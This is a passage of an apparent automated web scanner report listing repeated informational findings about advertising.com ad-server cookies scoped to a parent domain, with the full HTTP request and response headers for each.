GET /site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:05:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:05:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:05:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.98. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=1334983&rk1=82780216&rk2=1316239456.072&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:02:51 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:02:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:02:51 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.99. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38185087&rk1=62469548&rk2=1316239584.729&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:05:00 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:05:00 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:05:00 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.100. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71482072&rk1=45911150&rk2=1316239536.305&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:04:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:04:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:04:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.101. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=20562183&rk1=63496433&rk2=1316239504.461&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:03:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:03:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:03:39 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.102. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:58 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:58 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.103. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:18 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.104. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=21477175&rk1=64080944&rk2=1316239421.979&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:02:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.105. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=33923723&rk1=62964858&rk2=1316239321.3&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
